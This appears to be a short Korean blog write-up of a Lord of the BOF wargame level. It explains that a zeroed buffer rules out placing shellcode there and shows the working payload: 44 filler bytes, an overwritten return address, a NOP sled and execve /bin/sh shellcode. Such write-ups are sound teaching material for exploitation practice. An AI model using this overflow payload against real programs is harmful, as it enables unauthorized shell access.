문제다.
goblin문제와 같지만 bufer hunter가 추가되어 버퍼를 비운다.
1. 환경변수 사용불가
2. 카나리존재
3. buffer를 비움 -> 버퍼내에 쉘코드 불가
goblin과 똑같은 방식으로 풀었다.
buffer를 A로 44byte 채웠고, ret 4byte에 이동할 주소를 넣는다. 그리고 NOP로 채우고 쉘코드를 실행한다.
내 페이로드다
./wolfman `python -c'print "A"*44+"\xe0\xfb\xff\xbf"+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
성공
love eyuna
'wargame > S_LOB' 카테고리의 다른 글
| darkelf->orge (0) | 2016.08.31 |
|---|---|
| wolfman->darkelf (2) | 2016.08.31 |
| goblin->orc (0) | 2016.06.23 |
| cobolt -> goblin (0) | 2016.06.14 |
| gremlin->cobolt (0) | 2016.06.12 |
